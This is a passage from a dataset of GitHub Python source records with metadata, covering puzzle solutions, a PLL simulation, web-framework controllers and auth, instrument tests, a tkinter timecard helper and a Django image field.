1]],\n # [[1, 0], [1, 1], [2, 0]],\n # [[1, 0], [1, -1], [1, 1]],\n # [[1, 0], [2, 0], [1, -1]],\n # ]\n\n # def brute(N: int, M: int, r: int, c: int) -> int:\n # max_size = 0\n #\n # for tetromino in tetrominos:\n # size = board[r][c]\n # for row, col in tetromino:\n # nr, nc = r + row, c + col\n # if 0 <= nr < N and 0 <= nc < M:\n # size += board[nr][nc]\n # else:\n # size = 0\n # break\n # if size:\n # max_size = max(size, max_size)\n #\n # return max_size\n","repo_name":"Just-NB/Algorithm","sub_path":"Baekjoon/구현/Gold/14500_테트로미노.py","file_name":"14500_테트로미노.py","file_ext":"py","file_size_in_byte":2543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12612693047","text":"from pdf2image import convert_from_path\n\n\ndef convert_pdf_to_png(pdf_file_path, page_number, output_folder):\n images = convert_from_path(pdf_file_path, first_page=page_number + 1, last_page=page_number + 1)\n\n if images:\n image = images[0]\n output_path = f\"{output_folder}/barcode_{page_number + 1}.png\"\n image.save(output_path, \"PNG\")\n return output_path\n else:\n return None","repo_name":"Rustam0007/xim_test","sub_path":"lib/pdf2png.py","file_name":"pdf2png.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69992615847","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 5 14:06:46 2017\n\n@author: tmurphy\n\nModel of PLL displaying open loop, closed loop, and loop filter response\noutputting graphs of magnitude and phase for each.\n\nEquations taken from PLL Performance, Simulation, and Design; 5th Edition; Dean Banerjee\n\nloop filter should be correct.\nopen loop and 
closed loop appear accurate.\nTime response not working right?\nIs N correct?if not adjust kpd after fixing N?\nAdd phase noise plot if possible?\n\"\"\"\n\nfrom scipy import signal\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\n\n# CP, VCO, and Divider parameters\nkpd = 2.5e-3 # icp also\nkvco = 110e6\nn = 59.139\n\n# Fourth Order Loop filter parameters\nc1 = 1.52e-9\nc2 = 37.7e-9\nc3 = 893e-12\nc4 = 253.3e-12\nr2 = 145\nr3 = 113\nr4 = 738\n\n# Constants used in transfer function of loop filter and open loop response\na0 = c1 + c2 + c3 + c4\na1 = c2 * r2 *(c1 + c3 + c4) + r3 * (c1 + c2) * (c3 + c4) + c4 * r4 *(c1 + c2 + c3)\na2 = c1 * c2 * r2 * r3 * (c3 +c4) + c4 * r4 * (c2 * c3 * r3 + c1 * c3 * r3 + c1 * c2 * r2 + c2 * c3 * r2)\na3 = c1 * c2 * c3 * c4 * r2 * r3 * r4\nk = kpd * kvco\nt2 = r2 * c2\nt2_open = t2 * k\n\n# adjusted constants for closed loop response\ns1 = (t2 * k) / n\ns0 = k / n\n\n\ndef graph_mag(w, mag, title): # function for graphing magnitude response\n plt.figure()\n plt.semilogx(w, mag) # Bode magnitude plot\n plt.grid()\n plt.gca().xaxis.grid(True, which='minor')\n plt.title(title)\n plt.xlabel(r'Frequency (Hz)')\n plt.ylabel(r'Magnitude (db)')\n\ndef graph_phase(w, phase, title): # function for graphing phase response\n plt.figure()\n plt.semilogx(w, phase) # Bode Phase plot\n plt.grid()\n plt.gca().xaxis.grid(True, which='minor')\n plt.title(title)\n plt.xlabel(r'Frequency (Hz)')\n plt.ylabel(r'Phase (deg)')\n\ndef graph_cl(): # graph just closed loop gain response\n # Closed loop transfer response for PLL\n graph_mag(freq, mag_c, 'Closed Loop PLL Response') \n graph_phase(freq, phase_c, 'Closed Loop PLL Response')\n plt.show()\n\ndef graph_ol(): # graph just open loop gain response\n # Open loop transfer response for PLL\n graph_mag(freq, mag_o, 'Open Loop PLL Response') \n graph_phase(freq, phase_o, 'Open Loop PLL Response')\n plt.show()\n\ndef graph_lf(): # graph just open loop gain response\n # Open loop transfer response for PLL\n graph_mag(freq, mag, 'Loop Filter Response') \n graph_phase(freq, phase, 'Loop Filter Response')\n plt.show()\n\ndef graph_noise(): # graph just phase noise\n plt.figure()\n plt.semilogx(freq, vco_noise, 'b--')\n plt.semilogx(freq, ref_noise, 'g--')\n plt.semilogx(freq, s_ref, 'm')\n plt.semilogx(freq, vco_noise, 'r')\n# plt.semilogx(freq, r2_noise, 'r--')\n# plt.semilogx(freq, r3_noise, 'g--')\n# plt.semilogx(freq, r4_noise, 'b--')\n# plt.semilogx(freq, r_tot, 'm--')\n plt.grid()\n plt.ylim([-160,-60])\n plt.gca().xaxis.grid(True, which='minor')\n plt.title('Phase Noise')\n plt.xlabel(r'Frequency (Hz)')\n plt.ylabel(r'Phase Noise Power (dbc/Hz)')\n plt.show()\n\n#def r_noise(vx, tr): # equation to convert resistor noise from V to dBc/Hz\n# rout = (vx * kvco) / (freq * math.sqrt(2)) * abs(tr / [1 + mag_o/n])\n# return rout\n\n# numerators for transient response\nnum_filter = [t2, 1]\nnum_open = [t2_open, k]\nnum_closed = [s1, s0]\n\n# denominators for transient response\nden_filter = [a3, a2, a1, a0, 0]\nden_open = [a3, a2, a1, a0, 0, 0]\nden_closed = [a3, a2, a1, a0, s1, s0]\n\n# create transfer functions\nf_filter = signal.TransferFunction(num_filter, den_filter)\nf_open = signal.TransferFunction(num_open, den_open)\nf_closed = signal.TransferFunction(num_closed, den_closed)\n\n# create plot data\nfreq = np.arange (1, 100e6, 10) # frequency range 0.1Hz to 100MHz\nx_new = freq * 2 * np.pi # change frequency to rads/s for bode plot function\nw, mag, phase = signal.bode(f_filter, x_new) # loop filter creation\nw_o, 
mag_o, phase_o = signal.bode(f_open, x_new) # open loop creation\nw_c, mag_c, phase_c = signal.bode(f_closed, x_new) # closed loop creation\n\n\n# Phase Noise Simulation\nref_noise = np.piecewise(freq, [freq < 1, (10 > freq) & (freq >= 1), (100 > freq) & (freq >= 10), (1e3 > freq) & (freq >= 100), (1e4 > freq) & (freq >= 1e3), freq >= 1e4], [lambda x: -32 * np.log10(1241 * x), lambda x: -21 * np.log10(5.179e4 * x), lambda x: -17 * np.log10(1.145e6 * x), lambda x: -3 * np.log10(4.642e43 * x), lambda x: -5 * np.log10(1e25 * x), -145])\nvco_noise = np.piecewise(freq, [freq < 1e4, (1e5 > freq) & (freq >= 1e4), (1e6 > freq) & (freq >= 1e5), (1e7 > freq) & (freq >= 1e6), (2e7 > freq) & (freq >= 1e7), (1e8 > freq) & (freq >= 2e7), freq >= 1e8], [lambda x: -30 * np.log10(0.1166 * x), lambda x: -23 * np.log10(x), lambda x: -21 * np.log10(2.994 * x), lambda x: -20 * np.log10(6.310 * x), lambda x: -19.93 * np.log10(6.711 * x), lambda x: 42.73 * 10**(-3.862e-8 * x) - 169.2, -196])\ns_ref = 10*np.log10(mag_c)\ns_vco = vco_noise * 1/np.asarray(mag_o+1)\n\n# loop filter noise\nv2 = math.sqrt(4 * 300 * 1.380658e-23 * r2)\nv3 = math.sqrt(4 * 300 * 1.380658e-23 * r3)\nv4 = math.sqrt(4 * 300 * 1.380658e-23 * r4)\nz1 = signal.TransferFunction([c2*r2, 1], [c1*c2*r2, c1+c2, 0])\nz2 = signal.TransferFunction([c3*c4*r3*r4, (c3*r3)+(c4*r4)+(r3*c4), 1],[c3*c4*r4, c3+c4, 0])\ntmid = signal.TransferFunction(1, [c3*c4*r3*r4, (c3*r3)+(c4*r4)+(r3*c4), 1])\nvn1, carry1, zn1= signal.bode(z1, x_new)\nvn2, carry2, zn2= signal.bode(z2, x_new)\nvn3, carry3, zn3= signal.bode(tmid, x_new)\ntr2 = (carry3 * x_new * c2 * carry2) / (1 + x_new * [c2*r2 + c1*carry2 + c2*carry2] + x_new**2*c1*c2*r2*carry2)\ntr3 = (carry3*carry2)/(carry1+carry2)\ntr4 = (1 + x_new*c3*(r3+carry1)) / (1 + x_new*[(c3+c4)*(r3+carry1)+c4*r4] + x_new**2 * c3 * c4 * r4 * (r3+carry1))\nr2_noise = np.transpose(r_noise(v2, tr2))\nr3_noise = np.transpose(r_noise(v3, tr3))\nr4_noise = np.transpose(r_noise(v4, tr4))\nr_tot = 10*np.log10(10**(r2_noise/10) + 10**(r3_noise/10) + 10**(r4_noise/10))\n\n\n\n\n\n\n\n\n","repo_name":"jsochacki/simpyle_systems","sub_path":"linear_systems/PLL_Simulation.py","file_name":"PLL_Simulation.py","file_ext":"py","file_size_in_byte":6022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25039632725","text":"from blacksheep import RoutesRegistry\nfrom blacksheep.server.openapi.v3 import OpenAPIHandler\n\nfrom app.settings import Settings\nfrom app.core.common.mediator import Mediator\nfrom .base import BaseController\nfrom .info import InfoController\nfrom .auth import AuthController\nfrom .users import UsersController\nfrom .grounds import GroundsController\nfrom .exc_handlers import ( # noqa\n validation_error_handler,\n auth_error_handler,\n)\n\n\ndef setup(\n route_registry: RoutesRegistry,\n settings: Settings,\n docs: OpenAPIHandler,\n mediator: Mediator,\n) -> None:\n\n controllers: list[BaseController] = [\n InfoController(\n router=route_registry,\n settings=settings,\n docs=docs,\n mediator=mediator,\n ),\n AuthController(\n router=route_registry,\n settings=settings,\n docs=docs,\n mediator=mediator,\n ),\n UsersController(\n router=route_registry,\n settings=settings,\n docs=docs,\n mediator=mediator,\n ),\n GroundsController(\n router=route_registry,\n settings=settings,\n docs=docs,\n mediator=mediator,\n ),\n ]\n for controller in controllers:\n 
controller.register()\n","repo_name":"neekrasov/workout_helper","sub_path":"app/presentation/api/controllers/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"34107477392","text":"\"\"\"\nThis file contains the view scripts\n\"\"\"\nimport os\n\nfrom app import flask_app\nfrom flask import request, render_template, url_for, jsonify\nfrom werkzeug.utils import secure_filename\n\nfrom app.celery_run import celery_app\nfrom app.tasks import upload_from_link, upload_from_disk\nimport uuid\n\n\n@flask_app.route('/', methods=['GET'])\ndef index():\n    \"\"\"\n    View for the main page\n\n    :return: The main page with the file upload form\n    \"\"\"\n    if request.method == 'GET':\n        return render_template('index.html')\n\n\n@flask_app.route('/uploadfile', methods=['POST'])\ndef uploadfile():\n    \"\"\"\n    View that starts a file upload. Clicking the button on the main page\n    sends a request to this view. Depending on whether the user entered a link to a file\n    or selected a file to upload, the corresponding task is added to the Celery queue.\n\n    :return: Returns status 202 when the tasks are successfully added to the queue\n    \"\"\"\n\n    file = request.files['file']\n    # If the form contains no file, download from the link instead\n    if not file.filename:\n        task = upload_from_link.delay(request.form['url_text'])\n    else:\n\n        filename = secure_filename(file.filename)\n        # Save the file to disk\n        file_path = os.path.join(flask_app.config['UPLOAD_FOLDER'], filename + str(uuid.uuid4()))\n        file.save(file_path)\n        file.close()\n        task = upload_from_disk.delay(file_path)\n    return jsonify({}), 202, {'Location': url_for('taskstatus',\n                                                  task_id=task.id),\n                              'err_message': ''}\n\n\n@flask_app.route('/status/<task_id>')\ndef taskstatus(task_id):\n    \"\"\"\n    Looks up the task with the given task_id and returns information about its state\n\n    :param guid task_id: Identifier of the task in Celery.\n    :return: JSON object containing information about the task state\n    \"\"\"\n    task = celery_app.AsyncResult(task_id)\n    # Task is waiting in the queue\n    if task.state == 'PENDING':\n        response = {\n            'state': task.state,\n            'current': 0.5,\n            'total': 1,\n            'status': 'Queued'\n        }\n    # Task is running and progress data can be read from it\n    elif task.state != 'FAILURE':\n        response = {\n            'state': task.state,\n            'current': task.info.get('current', 0),\n            'total': task.info.get('total', 1),\n            'status': task.info.get('status', '')\n        }\n        if 'result' in task.info:\n            response['result'] = task.info['result']\n    # The task script raised an exception\n    else:\n        response = {\n            'state': task.state,\n            'current': 1,\n            'total': 1,\n            'status': str(task.info),\n        }\n    return jsonify(response)\n","repo_name":"kolotilko/csv_upload","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3521,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"5540113096","text":"# XOR decryption\n\nfrom statistics import mode\n\n\ntext = open('Solved/59.txt').read()\ncharacters = text.split(',')\n\ncommons = \" ea\"\nmode0 = int(mode([characters[i] for i in range(len(characters)) if i % 3 == 0]))\nmode1 = int(mode([characters[i] for i in range(len(characters)) if i % 3 == 1]))\nmode2 = int(mode([characters[i] for i in range(len(characters)) if i % 3 == 2]))\n\nkeys = []\nfor common0 in commons:\n    for common1 in commons:\n        
for common2 in commons:\n char0 = chr(ord(common0) ^ mode0)\n char1 = chr(ord(common1) ^ mode1)\n char2 = chr(ord(common2) ^ mode2)\n keys.append(char0 + char1 + char2)\n\nfor key in keys:\n a = key[0]\n b = key[1]\n c = key[2]\n decrypt = ''\n bad = False\n for i in range(len(characters)):\n if i % 3 == 0:\n x = ord(a)\n elif i % 3 == 1:\n x = ord(b)\n else:\n x = ord(c)\n n = int(characters[i]) ^ x\n if 128 > n > 31:\n decrypt += chr(n)\n else:\n bad = True\n break\n if not bad:\n print(a+b+c+\":\", decrypt)\n print(sum(ord(char) for char in decrypt))\n print()\n","repo_name":"altith01/ProjectEuler","sub_path":"Solved/59.py","file_name":"59.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"36088815718","text":"import time\n\nimport epics\n\nfrom haven.instrument.energy_positioner import EnergyPositioner\n\n\ndef test_pseudo_to_real_positioner(ioc_mono, ioc_undulator):\n positioner = EnergyPositioner(\n name=\"energy\",\n mono_pv=ioc_mono.pvs[\"energy\"],\n id_prefix=ioc_undulator.prefix.strip(\":\"),\n id_tracking_pv=ioc_mono.pvs[\"id_tracking\"],\n id_offset_pv=ioc_mono.pvs[\"id_offset\"],\n )\n positioner.mono_energy.wait_for_connection()\n positioner.id_energy.wait_for_connection()\n positioner.energy.set(10000, timeout=5.0)\n assert positioner.get(use_monitor=False).mono_energy.user_setpoint == 10000\n positioner.id_offset.set(230)\n time.sleep(0.1)\n # Move the energy positioner\n positioner.energy.set(5000)\n time.sleep(0.1) # Caproto breaks pseudopositioner status\n # Check that the mono and ID are both moved\n assert positioner.get(use_monitor=False).mono_energy.user_setpoint == 5000\n expected_id_energy = 5.0 + positioner.id_offset.get(use_monitor=False) / 1000\n assert positioner.get(use_monitor=False).id_energy.setpoint == expected_id_energy\n\n\ndef test_real_to_pseudo_positioner(ioc_mono, ioc_undulator):\n positioner = EnergyPositioner(\n name=\"energy\",\n mono_pv=ioc_mono.pvs[\"energy\"],\n id_prefix=ioc_undulator.prefix.strip(\":\"),\n id_tracking_pv=ioc_mono.pvs[\"id_tracking\"],\n id_offset_pv=ioc_mono.pvs[\"id_offset\"],\n )\n positioner.wait_for_connection(timeout=10.0)\n # Move the mono energy positioner\n epics.caput(ioc_mono.pvs[\"energy\"], 5000.0)\n time.sleep(0.1) # Caproto breaks pseudopositioner status\n assert epics.caget(ioc_mono.pvs[\"energy\"], use_monitor=False) == 5000.0\n # assert epics.caget(\"mono_ioc:Energy.RBV\") == 5000.0\n # Check that the pseudo single is updated\n assert positioner.energy.get(use_monitor=False).readback == 5000.0\n","repo_name":"spc-group/haven","sub_path":"tests/test_energy_positioner.py","file_name":"test_energy_positioner.py","file_ext":"py","file_size_in_byte":1873,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"70615828692","text":"from typing import Optional\n\nfrom fastapi import Depends, HTTPException\nfrom fastapi.security import OAuth2PasswordBearer\nfrom jose import jwt\nfrom pydantic import ValidationError\nfrom sqlalchemy.ext.asyncio import AsyncSession as Session\n\nfrom app import database, model\nfrom app.core import security\nfrom app.core.config import configs\nfrom .db import get_db\n\nreusable_oauth2 = OAuth2PasswordBearer(tokenUrl=f\"{configs.API_V1_STR}/login/token\")\n\n# Define various access restrictions we can Depends() on later\n# Authenticated user\nasync def get_current_user(\n db: Session = Depends(get_db), token: str = 
Depends(reusable_oauth2)\n) -> database.User:\n try:\n payload = jwt.decode(token, configs.SECRET_KEY, algorithms=[security.ALGORITHM])\n token_data = model.TokenPayload(**payload)\n if not token_data.sub:\n raise jwt.JWTError\n except (jwt.JWTError, ValidationError):\n raise HTTPException(status_code=401, detail=\"Must be authenticated\")\n user = await database.user.get(db, id=token_data.sub)\n if not user:\n raise HTTPException(\n status_code=400, detail=\"Token does not point to a valid user\"\n )\n return user\n\n\n# Admin user\ndef get_admin_user(\n db: Session = Depends(get_db), user: database.User = Depends(get_current_user)\n) -> database.User:\n if not database.user.is_admin(db, user=user):\n raise HTTPException(\n status_code=403,\n detail=\"User does not have the required privileges to access this resource\",\n )\n return user\n\n\nclass Permission:\n permission: Optional[str]\n\n def __init__(self, permission: Optional[str] = None):\n self.permission = permission\n\n def __call__(self, user: database.User = Depends(get_current_user)):\n if not user:\n raise HTTPException(status_code=401, detail=\"Not authenticated\")\n if self.permission == \"admin\" and not user.is_admin:\n raise HTTPException(\n status_code=403,\n detail=\"User does not have the required privileges to access this resource\",\n )\n return user\n","repo_name":"accelleon/cloudmgmt","sub_path":"backend/app/app/api/core/security.py","file_name":"security.py","file_ext":"py","file_size_in_byte":2123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"15952581381","text":"# https://leetcode.com/problems/complete-binary-tree-inserter\n\n# https://leetcode.com/problems/complete-binary-tree-inserter/solution\n\n\nfrom TreeNode import TreeNode\n\n# runtime; 720ms, 7.01%\n# memory; 13.2MB, 100.00%\nclass CBTInserter:\n\n def __init__(self, root):\n self.root = root\n\n def insert(self, v):\n q = [self.root]\n while q:\n node = q.pop(0)\n if node.left is None:\n node.left = TreeNode(v)\n return node.val\n elif node.right is None:\n node.right = TreeNode(v)\n return node.val\n if node.left:\n q.append(node.left)\n if node.right:\n q.append(node.right)\n return 0\n\n def get_root(self):\n return self.root\n\n\nc = CBTInserter(TreeNode(1))\nprint(c.insert(2))\nprint(c.get_root())\n\nroot = TreeNode(1)\nroot.left = TreeNode(2)\nroot.right = TreeNode(3)\nroot.left.left = TreeNode(4)\nroot.left.right = TreeNode(5)\nroot.right.left = TreeNode(6)\nc = CBTInserter(root)\nprint(c.insert(7))\nprint(c.insert(8))\nprint(c.get_root())\n","repo_name":"hyunjun/practice","sub_path":"python/problem-tree/complete_binary_tree_inserter.py","file_name":"complete_binary_tree_inserter.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"66"} +{"seq_id":"22694334636","text":"import tkinter as tk\nimport timecard_helper as th\nimport datetime\n\n\ndef switch_time_left():\n \"\"\"\n Switch to the Time Left screen.\n \"\"\"\n time_left_frame.pack()\n time_left(time_left_frame)\n menu_frame.forget()\n\n\ndef switch_convert():\n \"\"\"\n Switch to the Convert screen\n \"\"\"\n convert_frame.pack()\n converter(convert_frame)\n menu_frame.forget()\n\n\ndef switch_scheduler():\n \"\"\"\n Switch to the Scheduler screen\n \"\"\"\n scheduler_frame.pack()\n scheduler(scheduler_frame)\n menu_frame.forget()\n\n\ndef switch_time_difference():\n \"\"\"\n Switch to the Time Difference screen\n \"\"\"\n 
time_difference_frame.pack(fill='x')\n time_difference(time_difference_frame)\n menu_frame.forget()\n\n\ndef switch_sr():\n \"\"\"\n Switch to the Scheduler screen for Thursday.\n \"\"\"\n sr_frame.pack()\n sr(sr_frame)\n scheduler_frame.forget()\n\n\ndef switch_sf():\n \"\"\"\n Switch for the Scheduler screen for Friday.\n \"\"\"\n sf_frame.pack()\n sf(sf_frame)\n scheduler_frame.forget()\n\n\ndef time_left(frame):\n \"\"\"\n Calculates the time left to work, given how many hours have been already worked.\n Assumes 40 hours a week.\n \"\"\"\n txt = tk.Message(frame, text=\"Calculate time left to work\", width=300)\n total_hours = 40.00\n\n def enter_click():\n this_week = float(hours.get())\n remaining = total_hours - this_week\n string = \"Hours left to work: \" + str(remaining)\n msg = tk.Message(frame, text=string, width=300)\n msg.pack()\n\n hours = tk.StringVar()\n textbox = tk.Entry(frame, textvariable=hours)\n ent = tk.Button(frame, text=\"Enter\", command=enter_click)\n\n txt.pack(side=tk.TOP)\n textbox.pack()\n ent.pack()\n\n\ndef converter(frame):\n \"\"\"\n The screen for converting minutes from a decimal.\n \"\"\"\n txt = tk.Message(frame, text=\"Calculate minutes from decimal\", width=300)\n\n def enter_click():\n time = float(entry.get())\n converted = th.convert_helper(time, 1)\n string = \"This is equivalent to \" + str(converted)\n msg = tk.Message(frame, text=string, width=300)\n msg.pack()\n\n entry = tk.StringVar()\n textbox = tk.Entry(frame, textvariable=entry)\n ent = tk.Button(frame, text=\"Enter\", command=enter_click)\n\n txt.pack(side=tk.TOP)\n textbox.pack()\n ent.pack()\n\n\ndef scheduler(frame):\n \"\"\"\n The starting screen for the Scheduler.\n \"\"\"\n txt1 = tk.Message(frame, text=\"Schedule the rest of the week\", width=300)\n txt2 = tk.Message(frame, text=\"Which day would you like to schedule?\", width=300)\n\n r_button = tk.Button(frame, text=\"Thursday\", command=switch_sr)\n f_button = tk.Button(frame, text=\"Friday\", command=switch_sf)\n\n txt1.pack(side=tk.TOP)\n txt2.pack(side=tk.TOP)\n r_button.pack(side=tk.LEFT)\n f_button.pack(side=tk.RIGHT)\n\n\ndef sr(frame):\n \"\"\"\n The scheduling screen for Thursday.\n \"\"\"\n txt1 = tk.Message(frame, text=\"How many hours have you worked so far?\", width=300)\n txt2 = tk.Message(frame, text=\"What time did you check in? (HH:MM) \", width=300)\n txt3 = tk.Message(frame, text=\"What time do you have to start on Friday? 
(HH:MM) \", width=300)\n var1 = tk.StringVar()\n var2 = tk.StringVar()\n var3 = tk.StringVar()\n\n def enter_click():\n sum = float(var1.get())\n checkin = var2.get()\n fri_start = var3.get()\n sum_format = th.convert_helper(sum, 2).split(\":\")\n sum_hours, sum_minutes = int(sum_format[0]), int(sum_format[1])\n fri_time = th.difference_helper(fri_start, \"15:00\") - datetime.timedelta(minutes=30)\n tot = datetime.timedelta(hours=sum_hours, minutes=sum_minutes) + fri_time\n left = datetime.timedelta(hours=40) - tot\n if int(checkin.split(\":\")[0]) < 11:\n left += datetime.timedelta(minutes=30)\n in_format = checkin.split(\":\")\n in_hours, in_minutes = int(in_format[0]), int(in_format[1])\n checkout = datetime.datetime(2022, 1, 1, in_hours, in_minutes) + left\n string = \"Check out today at {:d}:{:02d}\".format(checkout.hour, checkout.minute)\n msg = tk.Message(frame, text=string, width=300)\n msg.pack()\n\n textbox1 = tk.Entry(frame, textvariable=var1)\n textbox2 = tk.Entry(frame, textvariable=var2)\n textbox3 = tk.Entry(frame, textvariable=var3)\n ent = tk.Button(frame, text=\"Enter\", command=enter_click)\n\n txt1.pack()\n textbox1.pack()\n txt2.pack()\n textbox2.pack()\n txt3.pack()\n textbox3.pack()\n ent.pack()\n\n\ndef sf(frame):\n \"\"\"\n The scheduler screen for Friday.\n \"\"\"\n txt1 = tk.Message(frame, text=\"How many hours have you worked so far?\", width=300)\n txt2 = tk.Message(frame, text=\"What time did you check in? (HH:MM) \", width=300)\n txt3 = tk.Message(frame, text=\"What time do you want to check out today? (HH:MM) \", width=300)\n var1 = tk.StringVar()\n var2 = tk.StringVar()\n var3 = tk.StringVar()\n\n def enter_click():\n sum = float(var1.get())\n checkin = var2.get()\n checkout = var3.get()\n sum_format = th.convert_helper(sum, 2).split(\":\")\n sum_hours, sum_minutes = int(sum_format[0]), int(sum_format[1])\n today_hours = th.difference_helper(checkin, checkout)\n if int(checkin.split(\":\")[0]) < 11:\n # We have not eaten lunch yet, that will happen before our end time\n today_hours -= datetime.timedelta(minutes=30)\n tot = today_hours + datetime.timedelta(hours=sum_hours, minutes=sum_minutes)\n left = datetime.timedelta(hours=40) - tot + datetime.timedelta(minutes=30)\n fri_start = datetime.datetime(2022, 1, 1, 15, 0) - left\n string = \"Start on Friday at {:d}:{:02d}\".format(fri_start.hour, fri_start.minute)\n msg = tk.Message(frame, text=string)\n msg.pack()\n\n textbox1 = tk.Entry(frame, textvariable=var1)\n textbox2 = tk.Entry(frame, textvariable=var2)\n textbox3 = tk.Entry(frame, textvariable=var3)\n ent = tk.Button(frame, text=\"Enter\", command=enter_click)\n\n txt1.pack()\n textbox1.pack()\n txt2.pack()\n textbox2.pack()\n txt3.pack()\n textbox3.pack()\n ent.pack()\n\n\ndef time_difference(frame):\n \"\"\"\n The screen for finding the difference between two times.\n \"\"\"\n txt = tk.Message(frame, text=\"Find the difference between two times\", width=300)\n\n def enter_click():\n time1 = var1.get()\n time2 = var2.get()\n diff = th.difference_helper(time1, time2)\n string = \"The difference in these times is \" + str(diff)\n msg = tk.Message(frame, text=string, width=300)\n msg.pack()\n\n var1 = tk.StringVar()\n var2 = tk.StringVar()\n textbox1 = tk.Entry(frame, textvariable=var1)\n textbox2 = tk.Entry(frame, textvariable=var2)\n ent = tk.Button(frame, text=\"Enter\", command=enter_click)\n\n txt.pack(fill='x')\n textbox1.pack()\n textbox2.pack()\n ent.pack()\n\n\ndef make_menu(menu_frame):\n \"\"\"\n The menu screen.\n \"\"\"\n txt = 
tk.Message(menu_frame, text=\"Select an option:\", width=300, font=\"courier\")\n one = tk.Button(menu_frame, text=\"(1) How much time left? \", width=35, font=\"courier\", command=switch_time_left)\n two = tk.Button(menu_frame, text=\"(2) Scheduler \", width=35, font=\"courier\", command=switch_scheduler)\n thr = tk.Button(menu_frame, text=\"(3) Decimal to minute converter\", width=35, font=\"courier\", command=switch_convert)\n fou = tk.Button(menu_frame, text=\"(4) Time difference \", width=35, font=\"courier\", command=switch_time_difference)\n\n txt.pack(fill='x')\n one.pack(side=tk.TOP)\n two.pack(side=tk.TOP)\n thr.pack(side=tk.TOP)\n fou.pack(side=tk.TOP)\n\n\n# Set up the window\nwin = tk.Tk()\nwin.title(\"Timecard Helper\")\nwin.geometry(\"700x500\")\n\n# Create all the frames used throughout the application\nmenu_frame = tk.Frame(win)\ntime_left_frame = tk.Frame(win)\nconvert_frame = tk.Frame(win)\ntime_difference_frame = tk.Frame(win)\nscheduler_frame = tk.Frame(win)\nsr_frame = tk.Frame(win)\nsf_frame = tk.Frame(win)\n\n\nmenu_frame.pack(fill='x')\nmake_menu(menu_frame)\n\nwin.mainloop()\n\n","repo_name":"k-lea/timecard-helper","sub_path":"timecard_gui.py","file_name":"timecard_gui.py","file_ext":"py","file_size_in_byte":8101,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"11442454754","text":"from django.db.models import ImageField\nfrom uuid import uuid4\nfrom snippet_image import create_snippet_image\n\nfrom .attributes import Attributes\n\n\nclass BaseSnippetImageFieldMixin:\n method_prefix = 'get_snippet_image'\n snippet_type = 'default'\n kwargs = {}\n should_be_created_method = 'snippet_image_should_be_created'\n\n def extract_specific_kwargs(self, kwargs):\n return self.extract_kwargs(kwargs, Attributes)\n\n @staticmethod\n def extract_kwargs(kwargs, attributes):\n \"\"\"\n Extract filled attributes from kwargs.\n\n :param kwargs: The dictionary from which attributes will be extracted.\n :type kwargs: dict\n :param attributes: The enumerate of attributes that will be retrieved from the dictionary.\n :type attributes: Enum\n\n :return: extracted kwargs.\n :rtype: dict\n \"\"\"\n extracted_kwargs = {}\n for attribute in attributes:\n if kwargs.get(attribute.name):\n extracted_kwargs[attribute.name] = kwargs.pop(attribute.name)\n\n return extracted_kwargs\n\n def should_be_created(self, instance):\n method = getattr(instance, self.should_be_created_method, None)\n return method() if method else True\n\n @staticmethod\n def get_file_name():\n return '{}.jpeg'.format(str(uuid4()))\n\n def collect_data(self, instance):\n data = {\n attribute.name: self.get_attribute_value(instance, attribute) for attribute in Attributes\n }\n\n return data\n\n def get_attribute_value(self, instance, attribute):\n attribute_name = attribute.name\n value = self.get_attribute_from_kwargs(attribute_name)\n\n if not value:\n value = self.get_attribute_from_instance(instance, attribute_name)\n\n if not value:\n value = attribute.value.default\n\n self.validate_attribute(attribute, value)\n\n return value\n\n @staticmethod\n def validate_attribute(attribute, value):\n try:\n attribute.value.validate(value)\n except ValueError as error:\n raise ValueError('Validation error for attribute {}: {}'.format(attribute.name, str(error)))\n\n def get_attribute_from_kwargs(self, attribute_name):\n return self.kwargs.get(attribute_name)\n\n def get_attribute_from_instance(self, instance, attribute_name):\n method_name = 
'{}_{}'.format(self.method_prefix, attribute_name)\n method = getattr(instance, method_name, None)\n if method:\n value = method(self.snippet_type)\n else:\n value = None\n\n return value\n\n @staticmethod\n def create_snippet_image(data):\n return create_snippet_image(**data)\n\n def get_specific_deconstruct_kwargs(self):\n kwargs = {\n attribute.name: self.kwargs.get(attribute.name)\n for attribute in Attributes\n if not self.kwargs.get(attribute.name) is None\n }\n kwargs['snippet_type'] = self.snippet_type\n\n return kwargs\n\n\nclass SnippetImageField(BaseSnippetImageFieldMixin, ImageField):\n def __init__(\n self,\n snippet_type='default',\n **kwargs\n ):\n \"\"\"\n\n :param snippet_type (str): To collect different data for different fields.\n For example value: 'facebook', 'twitter' and etc.\n :param kwargs: snippet_image.create_snippet_image and ImageField params.\n If create_snippet_image parameter was not set in the constructor,\n it will be taken from the method get_snippet_image_{param} of instance or default settings.\n create_snippet_image:\n :param font: Path to font file. Is required. For load font used PIL.ImageFont.\n :type font: str\n :param size: Size of snippet image. tuple(width, height).\n :type size: tuple(int, int)\n :param text: Text of snippet image. By default is an empty string.\n :type text: str\n :param background: Path to background image file.\n :type background: str\n :param background_color: Background color of snippet image. Used when background is None.\n :type background_color: tuple(int, int, int)\n :param overlay: Path to overlay image. if size is None, overlay size is used.\n As an overlay, an image with a transparent background is used.\n :type overlay: str\n :param brightness: Brightness of background of 